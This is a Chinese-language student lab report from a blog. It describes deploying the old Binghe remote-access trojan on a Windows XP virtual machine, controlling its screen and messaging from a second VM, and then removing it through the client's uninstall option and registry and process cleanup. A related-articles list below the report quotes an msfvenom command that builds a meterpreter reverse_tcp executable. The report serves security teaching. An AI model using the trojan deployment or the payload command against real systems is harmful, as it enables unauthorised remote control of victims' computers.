木马的远程控制和清除 实验

最新推荐文章于 2024-05-02 17:17:39 发布
最新推荐文章于 2024-05-02 17:17:39 发布
阅读量4.9k 收藏 55
点赞数 5
文章标签: p2p 服务器 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53397065/article/details/122029149
版权

本次记录曾做过的网络安全实验:phase 4

一、实验目的

    1. 理解木马的关键技术:包括木马的启动、隐藏和远程控制。

2. 使用一种木马实施远程控制,并进行清除。

二、实验环境

      Windows7 x64系统虚拟机;Window XP 系统虚拟机;冰河 V8.4

三、实验原理

                ,

    使用两台虚拟机,一台充当操作机,一台充当被种植木马的目标机,然后使用冰河木马对目标机实行远程控制。

四、实验内容

1. 使用一种木马实施远程控制,具体而言,在被攻击者计算机B上种入木马(服务器端木马),用攻击者计算机A(客户端木马)对计算机B实施如下远程控制:

(1)查看屏幕

(2)控制屏幕

(3)冰河信使

2. 两种方法清除木马:反卸载和手动删除。

五、实验步骤

  1. 准备好两个虚拟机

操作机 Windows 7 系统:

 目标机 Windows XP 系统:

     2.在操作机上准备好冰河软件

      3.配置服务端

(1)点击g_client 打开软件

(2)点击“设置”中的“配置服务器程序”打开“服务器配置”,从中设置访问口令,进程名称等

      4.运行目标主机

(1)将g_server发送到目标主机上

(2)运行g_server后,观察端口

查看端口,出现7626,证明端口已打开

(3)确定目标机的ip地址

(4)打开操作机的g_cilent,开始搜索目标机

搜索成功

点击文件就可以看到目标机里的文件

       5.远程控制:

(1)查看屏幕   

(2)控制屏幕

通过控制屏幕打开目标机的回收站

(3)冰河信使

通过信使可以实现操作机和目标机的交互

     操作机端:

     目标机端:

       6.两种方法清除木马

(1)反卸载

在g_client中选中目标机点击命令控制台

选择控制类命令中的系统控制,点击右下角自动卸载冰河

点击“是”系统提示“服务器端监控程序自动卸载完毕”

(2)手动卸载

在任务管理器中找到进程“KERNEL32.EXE”并结束该进程

删除保存在目标机里的g_server程序

打开注册表,在目录HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run里删除binghe

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunService”里删除binghe

在“HKEY_CLASSES_ROOT/txtfile/shell/open/command”下找到默认,将值改为:C:\WINDOWS\notepad.exe %1

 

六、实验结果分析及心得体会

实验结果分析:本次实验旨在理解木马的关键技术:包括木马的启动、隐藏和远程控制。使用一种木马实施远程控制,并进行清除。木马使用冰河木马,实验环境是在两台虚拟机上进行,一台为操作机Win 7 X64,一台为目标机Win XP 在操作机上配置好服务端,然后将木马种在目标机上,木马运行并打开7626端口,操作机便可通过木马对目标机进行远程操控。

心得体会:通过本次实验我了解到本次实验成功有好几个注意事项:冰河木马是一种很老的病毒,目前的系统已经可以自动对其作出识别并处理,所以运行只能在虚拟机上进行;值得注意的一点是冰河木马只能在32位的操作系统上运行,如果在64位操作系统运行则无法打开7626端口;操作机扫描目标机的过程中也需注意关掉目标机自带的Windows防火墙,否则无法成功建立连接。通过好几次的失败终于成功做成这次实验,大大加深了我对冰河木马的认知。

Hanaya sou
关注
  • 5
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《信息安全技术》实验木马远程控制技术
axhc_chentao1981的博客
11-27 2252
《信息安全技术》实验木马远程控制技术 实验目的 剖析网页木马的工作原理 理解木马的植入过程 学会编写简单的网页木马脚本 通过分析监控信息实现手动删除木马 实验内容 木马生成与植入 利用木马实现远程控制 木马的删除 实验人数 每组2人,本组为20155314 20155304 实验环境 系统环境 Windows Server 2003虚拟机 网络环境 交换网络结构...
木马冰河之原理篇(深入浅出看木马
Inside Windows
11-05 5250
主题:木马冰河之原理篇(转载)    在网上,大家最关心的事情之一就是木马:最近出了新的木马吗?木马究竟能实现哪些功能?木马如何防治?木马究竟是如何工作的?本文试图以我国最著名的木马之一 冰河为例,向大家剖析木马的基本原理,为大家揭开木马的神秘面纱。   木马冰河是用delphi和C++Builder写的,为了便于大家理解,我将用相对比较简单的VB来说明它,其中涉及到一些WinSock编程和Win
病毒实验木马病毒实验
12-06
了解木马程序的结构、传播方法、安装与自启动机制,加深木马病毒原理的认识;掌握木马病毒的查杀一般方法。
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
最新发布
2401_84263434的博客
05-02 891
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
木马攻击实验
qq_45768092的博客
10-19 2497
木马攻击实验 计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能表面无害的恶意代码,是具备破坏和删除文件、发送密码、记录键盘等特殊功能的后门程序。 学员需在本实验中通过“冰河木马的使用,掌握木马的工作原理以及清除方法。 实验简介 实验所属系列:系统安全攻防技术与实践 实验对象: 本科/专科信息安全专业 相关课程及专业:计算机基础,网络安全 实验时数(学分):2学时 实验类别:实践实验类 预备知识 木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击
实验木马远程控制清除
君莫hacker的博客
10-13 4664
## 0x01环境配置 攻击者主机:Win7 (192.168.30.221) 受害者主机:winXP(192.168.30.134) 关闭防火墙 冰河木马下载 双击安装 自定义安装(要记住自定义安装的文件夹) 安装 打开所选择安装的文件夹 攻击者安装客户端应用 密码为:www.downcc.com ...
详细讲解黑客常用的远程控制木马
热门推荐
yakoo5的专栏
11-26 2万+
<!--v/:* {behavior:url(#default#VML);}o/:* {behavior:url(#default#VML);}w/:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}-->  Normal 0 7.8 磅 0
python实现远程控制
KUKULI233的博客
08-13 5304
python实现远程控制 准备 需要调用socket库,os库 概念原理 要实现远程控制就是要获取对方电脑的一个“shell” 它是操作系统中用于人机交互的部分,windows最常见的shell就是cmd。 Shell从控制方向上说分如下两类: 1.正向shell .被控制的电脑做服务器,黑客的电脑作客户端 .因为服务器需要不间断运行所以容易被检测到; .过程可能被防火墙拦截 2.反向shell ...
冰河木马实验
qq_45785457的博客
11-15 1万+
实验目的 1. 本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容: (1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击; (2) 利用网络安全工具或设备对入侵与攻击进行检测; (3) 能有效的对漏洞进行修补,提高系统的安全性,避免同种攻击的威胁。 2. 网络攻防综合实验将从实验设计、实验过程、实验结果、实验报告几个方面,对学生的综合实验能力进行锻炼。 【注意事项】 1.本木马程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理
木马远程控制
06-14
一些关于木马远程控制木马是如何通信的; 木马是如何控制的; 如何清除木马; 与远程控制的文档学习及代码
Python-PyRat基于pythonXmlRPC完成的远控开源项目
08-10
PyRat,基于python XmlRPC完成的远控开源项目,包括客户端和服务端(也叫控制端,后统称服务端)。
木马功放与远程控制
01-09
第4章 木马攻防与 远程控制 专用工具 捆绑 木马 “ ” 木马加壳解析 检测木马的加壳方式 ... 迅雷也能查杀弹窗 木马 ... 微点主动防御软件 查杀木马 ... UltraVNC远程控制 ... 开启和连接远程注册表服务
Windows木马远程控制技术借鉴.pdf
11-13
Windows木马远程控制技术借鉴.pdf
基于远程控制木马片段
08-14
直接在WIN32下vc中建立控制台程序,将文档贴过去,调试,运行,再打开命令行telnet远程登录,进行操作.代码片段仅供交流参考,拒绝非法活动.
网络安全基础(木马、概述、冰河木马实验
Pluto.的博客
12-10 4044
文章目录网络安全基础一、木马1. 概述2. 特性3. 组成4. 危害5. 传播途径6. 模拟实验 网络安全基础 一、木马 1. 概述 木马通常成为黑客程序,恶意代码,也称特洛伊木马,是一个基于远程控制的黑客工具,木马程序表面上是无害的,甚至对没有警戒的用户还颇有吸引力,它们经常隐藏在游戏或图形软件中,但它们却隐藏着恶意。 2. 特性 隐蔽性 将自己伪装成合法应用程序,使得用户难以识别,这是木马病毒的首要也是重要的特征。 潜伏性 木马病毒隐蔽的主要手段是欺骗,经常使用伪装的手段将自己合法化。例如,使用合法的
冰河木马的使用实验
你的猴子呀
12-19 8794
前言: 作者是一个普通高校学生,在博客上开通了[网络安全学习]专栏,以此激励自己坚持学习。由于是初次进行博客创作、经验不足、可能比较粗糙,如有错漏之处希望大家能够指正、也欢迎大家一起交流学习。 如需查看完整学习博文(笔记)请点击 [网络安全学习] 进行查看 注:本实验只为与大家一起学习探讨网络安全学习,请勿用作恶意途径。 一、实验目的及要求 (1)了解冰河木马的使用 (2)掌握木马防范措施 二、实验仪器、设备或软件 软件:冰河木马名为冰河远程监控软件,在推出伊始便饱受追捧,作为一款强大的远程监控软件,它
信息安全技术 实验木马远程控制技术
weixin_30950237的博客
11-27 367
信息安全技术 实验木马远程控制技术 实 验 报 告 实验名称: 木马远程控制技术 姓名: 杨瀚、李卓雯 学号: 20155313、20155201 班级: 1553、1552 日期: 2017.11.21 一、 实验环境 操作系统:windows 7、VM虚拟机中的windows 2003 实验工具:灰鸽子远程控制、监控器、协议分析器 二、 实验内容 1、木马生成与植...
程序内存驻留与木马原型实验结果与分析
05-21
程序内存驻留是指程序在执行过程中所占用的内存空间,包括程序代码、数据和运行时堆栈等。程序内存驻留的大小与程序的性能和稳定性密切相关。在实际应用中,程序内存驻留过大可能会导致系统运行缓慢、崩溃等问题。 木马原型实验是指通过模拟木马病毒的行为,测试系统的安全性能。在实验中,我们通常会构建一个包含木马病毒代码的程序,并将其运行在目标系统上,观察系统的反应和异常情况,以评估系统的防御能力和安全性。 关于程序内存驻留和木马原型实验的结果与分析,需要具体问题具体分析。一般来说,程序内存驻留过大可能会导致系统运行缓慢、崩溃等问题,而较小的内存驻留则可以提高程序运行效率和稳定性。在木马原型实验中,如果目标系统对于木马病毒的检测和防御能力较强,那么就会出现木马病毒无法生效的情况,反之,如果目标系统的防御能力不足,那么木马病毒就会成功入侵并对系统造成危害。 总之,在进行程序开发和系统安全测试时,需要综合考虑程序内存驻留和安全防御等因素,以确保程序和系统的稳定性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值